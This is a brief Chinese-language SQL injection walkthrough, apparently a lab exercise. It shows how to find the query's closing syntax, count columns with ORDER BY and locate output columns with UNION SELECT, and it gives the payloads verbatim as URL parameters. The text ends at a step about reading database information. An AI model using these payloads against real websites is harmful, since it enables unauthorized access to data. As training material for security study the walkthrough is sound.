一、使用转义符 “ \ ” 查询闭口的格式
查询结果显示使用的闭口形式为 (1')
二、使用order by来判断字段数
①在输入order by 4时,显示报错;
②在输入order by 3时,成功;说明他有三个字段。
代码:?id=-1') order by 3-- -
三、使用union联合注入,配合select查询可注入点。
代码:?id=-1') union select 1,2,3 -- -
结果:2,3为注入点
四、利用第三步得到的注入点查询系统与当前数据库信息